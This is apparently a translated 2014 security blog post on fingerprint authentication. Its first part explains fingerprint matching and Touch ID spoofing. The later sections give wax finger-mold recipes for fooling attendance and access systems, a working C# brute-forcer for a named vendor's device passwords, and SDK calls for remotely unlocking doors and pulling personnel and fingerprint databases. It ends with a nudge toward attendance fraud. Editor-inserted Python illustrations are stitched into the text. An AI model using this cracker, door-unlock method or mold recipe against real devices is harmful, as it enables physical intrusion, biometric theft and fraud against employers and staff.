Hainan Chicken Rice · 2014/06/03 12:43

0x00 Background


Traditional security technology treats the user's biometric information as the trusted object and uses it as an authentication factor for trusted computation: pattern recognition on the user's biometric data, cryptographic computation over the target's biometric pattern, fusion verification of the target, and so on. Many kinds of biometric features are in use at present, including fingerprint, face and voice. Indirect biometric identification includes DNA profiling, which can only be done with laboratory techniques; we are not forensic scientists, so it is not covered here.

0x01 Why Fingerprint Identification?


Fingerprint identification is the most widely deployed biometric on modern computers and networks (by unit count it exceeds every other biometric technology, and a properly configured fingerprint unit is claimed to reach a higher security level than iris recognition), and the problems that come with it keep emerging. If the technology is popularized in the future to the point of mobile phones in schools, mobile apps collecting fingerprints and uploading them to a server may cause real security problems.

0x02 Key points of traditional fingerprint identification technology


The history of fingerprinting goes back hundreds of years. In 1892 the British scholar Galton, in Finger Prints (1892), put forward three influential scientific arguments: 1. fingerprints do not change over a lifetime; 2. fingerprints are unique to the individual and can be used for identification; 3. fingerprints can be classified.

Henry's fingerprint classification divides fingerprints by shape into whorls, loops and arches.

Whorls can be subdivided into plain whorls, double loop whorls, central pocket whorls and accidental whorls;

Loops can be subdivided into ulnar loops and radial loops;

Arches can be subdivided into plain arches and tented arches.

The FBI maintains a database of 47 million sets of fingerprints, IAFIS, which uses eight kinds of analysis: ridge pattern; core and delta; inner terminus of a loop; outer terminus of a loop; inner terminus of a whorl; outer terminus of a whorl; ridge tracing; and fingerprint type.

The existing book "Fingerprint Pattern Recognition System: Algorithm and Implementation in Visual C++" is a very good technical reference here.

0x03 Common Steps for Fingerprint Identification


(1) Image preprocessing

Filtering and similar processing to clean up the raw image, then ridge enhancement, then thinning of the binarized fingerprint image down to a one-pixel-wide skeleton.

(2) Digitization of fingerprint features

Digitizing the ridge endings and ridge bifurcation points (the minutiae: features taken from characteristic ridge segments in the fingerprint texture).

(3) Feature matching

The feature template built from the collected ridge endings and bifurcations is measured against the stored template for topological matching.

0x04 General implementation principle of the technology


The authentication technology here covers image processing, feature extraction, the matching algorithm, and singular-point detection by Poincaré index. It is not as simple as the diagram suggests, and current devices basically do not store images: they compute a key from the fingerprint and store that instead. There is too much to cover in one article, so I only note it here; the algorithms can get an article of their own later.

The steps are:

1. The fingerprint is scanned (optically or otherwise).
2. The fingerprint is analyzed and the feature points (endings, bifurcations, cores and singular points) are extracted.
3. The fingerprint features are stored as a template in the fingerprint database.
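As an added worked example for steps (2) and (3) of 0x03 and the extraction/matching stages of 0x04 (this is editor-written illustration code, not code from the original article or from any of the products it mentions), the following Python extracts minutiae from a thinned skeleton with the crossing-number method and then matches two minutiae templates with a distance tolerance. The skeleton image, the tolerance, the decision threshold and the function names are all assumptions chosen for illustration; rotation handling and ridge-count checks, which real matchers use, are deliberately left out.

```python
"""Added example (not from the original article): minutiae extraction with the
crossing-number method, followed by a tolerance-based minutiae match.
The skeleton image, tolerance and decision threshold are constructed
assumptions for illustration, not a real sensor capture."""
from __future__ import annotations
import itertools
import math

# Constructed 1-pixel-wide ridge skeleton (1 = ridge pixel), i.e. what the
# thinning step in 0x03 produces.  It contains three ridge endings and one
# bifurcation.
SKELETON = [
    "000000000000",
    "011111111000",
    "000000001000",
    "000000001110",
    "000000001000",
    "000000001000",
    "000000000000",
]

# 8-neighbourhood in circular order, so consecutive entries are adjacent.
RING = [(-1, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1)]


def crossing_number(img: list[str], y: int, x: int) -> int:
    """Rutovitz crossing number: half the number of 0/1 transitions walking
    once around the 8 neighbours.  1 = ridge ending, 2 = ridge continues,
    3 = bifurcation."""
    vals = [int(img[y + dy][x + dx]) for dy, dx in RING]
    return sum(abs(vals[i] - vals[(i + 1) % 8]) for i in range(8)) // 2


def extract_minutiae(img: list[str]) -> list[tuple[int, int, str]]:
    """Return (x, y, kind) for each ridge pixel whose crossing number marks it
    as an ending or bifurcation.  Border pixels have no full ring and are
    skipped; a real extractor would also drop minutiae near the image edge."""
    found = []
    for y in range(1, len(img) - 1):
        for x in range(1, len(img[0]) - 1):
            if img[y][x] != "1":
                continue
            cn = crossing_number(img, y, x)
            if cn == 1:
                found.append((x, y, "ending"))
            elif cn == 3:
                found.append((x, y, "bifurcation"))
    return found


def translate(minutiae, dx: int, dy: int):
    """Shift a template; used to simulate the same finger placed elsewhere."""
    return [(x + dx, y + dy, k) for x, y, k in minutiae]


def match_score(probe, ref, tol: float = 1.5) -> float:
    """Fraction of probe minutiae that pair with a same-kind reference minutia
    within `tol` pixels, maximised over every translation that aligns one
    probe/reference pair.  Rotation and ridge-count checks are omitted."""
    if not probe or not ref:
        return 0.0
    best = 0
    for (px, py, pk), (rx, ry, rk) in itertools.product(probe, ref):
        if pk != rk:
            continue
        dx, dy = rx - px, ry - py          # candidate alignment
        used = set()                       # reference minutiae already paired
        hits = 0
        for qx, qy, qk in probe:
            for i, (sx, sy, sk) in enumerate(ref):
                if i not in used and sk == qk and \
                        math.hypot(qx + dx - sx, qy + dy - sy) <= tol:
                    used.add(i)
                    hits += 1
                    break
        best = max(best, hits)
    return best / len(probe)


def verify(probe, ref, threshold: float = 0.8) -> bool:
    """Accept when the match score clears the decision threshold.  The
    threshold sets the FAR/FRR trade-off; 0.8 is an arbitrary assumed value."""
    return match_score(probe, ref) >= threshold


if __name__ == "__main__":
    template = extract_minutiae(SKELETON)
    print(template)
    print(verify(translate(template, 3, 2), template))   # same finger, shifted
    print(verify(template[:2] + [(20, 20, "ending")], template))
```

The design point worth noticing is that the stored template is only the minutiae list, never the image, which is the "compute a key from the fingerprint and store that" idea above in its simplest form; and that the threshold in verify is where the false-accept / false-reject trade-off lives, so a lax threshold is exactly what a replicated finger exploits.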

0x05 Automatically generating a working fingerprint library with the fingerprint generator FPGenerator


Sometimes a batch of fingerprint samples is needed for system testing, and collecting them one by one is very troublesome. Here we can use FPGenerator from the Institute of Automation of the Chinese Academy of Sciences to generate the fingerprints we need as samples for a fingerprint database.

Outline:

Fingerprint mask generation: "Left", "Right", "Top" and "Bottom" adjust the left, right, top and bottom contours of the fingerprint image.

Background modification:

"None", "Optical", "Scrapping".

The process has 10 steps in total, including drying effects, image noise and other functions; whenever you need to test a fingerprint system you can use it to generate a collection of images.

0x06 Home-made finger mold extraction and replication


Sometimes, without generation software, we need the other party's finger mold, or a fingerprint forged from a stolen print (leaving a forged print of someone else at a crime scene is not something to do), or someone else's biometric fingerprint is simply stolen. Unlike a traditional password, a stolen fingerprint cannot be changed at any time; once it is gone it does not come back. So the purpose of this article is to emphasize the database security of fingerprint authentication systems, and other biometric systems used as a second factor need the same attention.

1. There are in fact many materials for fingerprint extraction, such as candle wax, cyanoacrylate adhesive, adhesive tape and so on. Listed here are the ones I could get my hands on directly.

2. For making the finger mold, you can simply use the dripped-wax method, which is convenient and uses readily available materials; the finger molds sold on the market seem to be made this way. There are of course also plastic products and Play-Doh, and more professional tape for lifting prints.

3. The finished finger mold looks roughly like the thumbprint of Uncle Tuben, and it can pass ordinary attendance machines and optical access-control systems.

0x07 WHY I HACKED TOUCHID: some interesting points from Marc Rogers's slides


At SyScan 2013, Marc Rogers demonstrated bypassing the iPhone's Touch ID fingerprint authentication with a finger mold. Several points in the "How Fingerprint FAIL" section of the slides are worth noting:

2. If you can obtain and copy fingerprint features, you can pull off a replay attack.
3. Gummy bears can fool many fingerprint systems, but gelatin works better (the kind used in breast implants, etc.).
4. Gelatin is a protein made from animal skin, so it is very similar to human skin; it is not surprising that gelatin is used in fingerprint replay attacks.
6. The latest systems recognize such simulated fingerprints as real ones too.

The 2002 paper Impact of Artificial "Gummy" Fingers on Fingerprint Systems also compared several materials (live finger, silicone and gelatin). The texture differences between them are not large and closely resemble a live human fingerprint, so it is easy to fool fingerprint products with weak liveness discrimination.

The slides describe the fingerprint extraction process in detail: digital photography, threshold and level adjustment, and printing, which makes producing the finger mold convenient.

The section "But, what does this mean?" makes several interesting points:

1. Fingerprint authentication is not the highest level of security measure, but it is a convenient one, so we often use it in attendance, access control and mobile phones.
2. Thieves on the street do not use fingerprint cloning to unlock stolen iPhones; they wipe the system and sell them.
3. On its own, fingerprint authentication should not be used to protect your bank account, passport or confidential documents.
4. Liveness detection is still somewhat difficult for access control and some older equipment, so additional monitoring such as temperature sensing is needed, though of course warming the mold with warm water may be able to bypass that.

0x08 Fingerprint attendance system software design flaws: some fun stuff


If you can take over a fingerprint attendance machine (other types of attendance machines too), in many cases you can get at all of a company's personnel information, so let me talk about some authentication flaws I found while studying fingerprint devices.

For software, I picked a relatively large-scale attendance product from the SINOBank downloads, among which the free version of the ZKTime series has a relatively large download count.

According to its introduction it supports almost every type of fingerprint attendance machine, fingerprint access controller and other fingerprint product of the same brand. Counting the devices connected to the network in China, there are probably more than six digits' worth of device terminals.

There is an article on the site titled "Outdoor Physical Device Intrusion: Hacking and 'tuning' the central control fingerprint voice attendance system". The author only wrote a general outline without analyzing the program, and some of the concepts are wrong; since I happen to be working on this anyway, I will rewrite some of it to correct it.

There is material online about the authentication of this kind of device to follow up on. Some say it is plaintext, but the password is not visible in the packets around the three-way handshake, so presumably it is hashed, and this password is presumably the same on the device side and the PC side. (Port 4370 is enabled by default; to brute-force it, the 6-digit combination must be enumerated.)

1. Work out the password processing flow and spoof it with crafted packets.
2. Pull the function directly out of the secondary-development SDK or the development materials.

Simply using the SDK is easy to understand; after about a day of reading I could start writing the password-cracking part.



The online-operation SDK documentation for fingerprint attendance is as follows:

There are two key functions for remote network authentication:

1. Connect_Net

VARIANT_BOOL Connect_Net([in] BSTR IPAdd, [in] long Port)

Returns a Boolean.

IPAdd is the remote device IP address and Port is the device authentication port.

2. SetCommPassword

VARIANT_BOOL SetCommPassword([in] long CommKey)

CommKey is the password.

The whole process is only a few lines of code; add a loop and it becomes a password-cracking program:

```csharp
// Brute-force the device communication password (CommKey) through the vendor SDK.
// comkeys / comkeystr: a short list of common keys tried first (24 entries).
// keys / keystr: the full 6-digit space, 000000..999999.
private void CrackerConnect()
{
    zkemkeeper.CZKEMClass axCZKEM1 = new zkemkeeper.CZKEMClass();
    int ifcommnetpass = 0;   // set to 1 once a key from the common list works
    int key;
    bool pwd;

    // Pass 1: common keys
    for (j = 0; j < 24; j++)
    {
        key = comkeys[j];
        pwd = axCZKEM1.SetCommPassword(key);   // sets the key used by the next connection
        if (pwd == true)
        {
            // Connect_Net is where the key is actually checked by the device
            bIsConnected = axCZKEM1.Connect_Net(txtIP.Text, Convert.ToInt32(txtPort.Text));
            if (bIsConnected == true)
            {
                btnConnect.BeginInvoke(new System.EventHandler(SetbtnConnectTextSec));
                lblState.BeginInvoke(new System.EventHandler(SetlblStateTextSec), comkeystr[j]);
                // With TCP/IP communication the machine number is ignored; any integer works. 1 is used here.
                iMachineNumber = 1;
                // Register the realtime events to be triggered (65535 = all of them)
                axCZKEM1.RegEvent(iMachineNumber, 65535);
                ifcommnetpass = 1;
                break;
            }
            else
            {
                lblState.BeginInvoke(new System.EventHandler(SetlblStateTextSecfail), comkeystr[j]);
            }
        }
    }

    // Pass 2: exhaustive 6-digit enumeration if no common key worked
    if (ifcommnetpass == 0)
    {
        for (j = 0; j < 1000000; j++)
        {
            key = keys[j];
            pwd = axCZKEM1.SetCommPassword(key);
            if (pwd == true)
            {
                bIsConnected = axCZKEM1.Connect_Net(txtIP.Text, Convert.ToInt32(txtPort.Text));
                if (bIsConnected == true)
                {
                    btnConnect.BeginInvoke(new System.EventHandler(SetbtnConnectTextSec));
                    lblState.BeginInvoke(new System.EventHandler(SetlblStateTextSec), keystr[j]);
                    // iMachineNumber = 1;                       // ignored over TCP/IP, see above
                    // axCZKEM1.RegEvent(iMachineNumber, 65535); // register all realtime events
                    break;
                }
                else
                {
                    lblState.BeginInvoke(new System.EventHandler(SetlblStateTextSecfail), keystr[j]);
                }
            }
        }
    }
    Cursor = Cursors.Default;
}
```

Note: register the control provided in the SDK first, then call its interface functions.
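To make the weakness concrete without touching a real terminal, here is an added Python example (editor-written; not from the article and not the vendor SDK) that runs the same two-phase enumeration as the C# cracker above against a simulated device. SimulatedDevice, COMMON_KEYS, the secret keys and the lockout policy are all constructed assumptions; the only facts taken from the page are that the CommKey is a 6-digit number and that the attack is a plain enumeration of it. The point the simulation makes is that 10^6 candidates with no lockout is a small keyspace, and that a simple failure counter on the device side is enough to break the loop.

```python
"""Added example (not from the article or the vendor SDK): the enumeration
pattern of the C# cracker above, run against a simulated terminal to show why
an unthrottled 6-digit numeric CommKey is weak and what a lockout policy
changes.  SimulatedDevice, COMMON_KEYS and every number here are constructed
assumptions, not observed vendor behaviour."""
from __future__ import annotations
import itertools
from typing import Callable, Iterable, Optional

KEYSPACE = 10 ** 6      # CommKey is a 6-digit number: 000000..999999
# Assumed list of likely default/lazy keys to try before the full space.
COMMON_KEYS = [0, 1, 123456, 111111, 888888, 666666, 654321, 112233]


class SimulatedDevice:
    """Stand-in for the terminal listening on port 4370.  `lockout_after`
    models a policy that refuses every further attempt after N failures;
    None means no lockout, which is the condition the brute force relies on."""

    def __init__(self, secret: int, lockout_after: Optional[int] = None):
        self.secret = secret
        self.lockout_after = lockout_after
        self.failures = 0
        self.attempts = 0

    def connect(self, key: int) -> bool:
        self.attempts += 1
        if self.lockout_after is not None and self.failures >= self.lockout_after:
            return False               # locked out: even the right key is refused
        if key == self.secret:
            return True
        self.failures += 1
        return False


def crack_comm_key(try_key: Callable[[int], bool],
                   common: Iterable[int] = COMMON_KEYS,
                   max_attempts: int = KEYSPACE) -> tuple[Optional[int], int]:
    """Two-phase enumeration, like the C# loop: common keys first, then the
    remaining 6-digit space in order.  `try_key` plays the role of
    SetCommPassword + Connect_Net.  Returns (key or None, attempts used)."""
    common_list = list(dict.fromkeys(common))           # keep order, drop dups
    common_set = set(common_list)
    rest = (k for k in range(KEYSPACE) if k not in common_set)
    attempts = 0
    for key in itertools.chain(common_list, rest):
        if attempts >= max_attempts:
            break
        attempts += 1
        if try_key(key):
            return key, attempts
    return None, attempts


def demo_no_lockout(secret: int) -> tuple[Optional[int], int]:
    """Device with no failure counter: the key is always found eventually."""
    dev = SimulatedDevice(secret)
    return crack_comm_key(dev.connect)


def demo_with_lockout(secret: int, lockout_after: int,
                      max_attempts: int) -> tuple[Optional[int], int]:
    """Device that locks after `lockout_after` failures: the enumeration
    burns its budget and never succeeds, even though the secret is in range."""
    dev = SimulatedDevice(secret, lockout_after)
    return crack_comm_key(dev.connect, max_attempts=max_attempts)


if __name__ == "__main__":
    print(demo_no_lockout(888888))            # found in the common-key pass
    print(demo_no_lockout(424242))            # found after ~424k attempts
    print(demo_with_lockout(10, 5, 100))      # never found: device locked
```

In the no-lockout case the worst case is one million connection attempts, which at even a few attempts per second is a matter of days, not years; the defence is on the device side (lockout or rate limiting per source, and not sharing one CommKey across the whole fleet), because nothing on the client side can be trusted to stop.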

With special intrusion programs developed from the SDK you can remotely switch the device on and off, remotely clear the password, open access-controlled doors, and so on.

For example, the door-opening function:

ACUnlock

[Function definition]

VARIANT_BOOL ACUnlock([in] long dwMachineNumber, [in] long Delay)

[Function]

Opens the door: the door controller outputs the door-open level and closes it again after Delay/10 seconds.

[Parameters]

dwMachineNumber

Machine number

Delay

Door-opening delay time

[Return value]

Returns True on success, False otherwise.

There are many other functions, such as sounding the alarm, automatic door opening, downloading the whole company database, photos and fingerprints, and even opening doors from a mobile phone, mobile access control and attendance devices, just like in the game Watch Dogs. Attendance and access-control devices really are important.

There will be some problems with attendance after the holiday; if you have read this article, you should know what to do.

Appendix:

References:

Implementation of Trusted Cloud Security Butler Technology

WHY I HACKED TOUCHID, Marc Rogers

TFT Series Offline Communication Development Kit Development Manual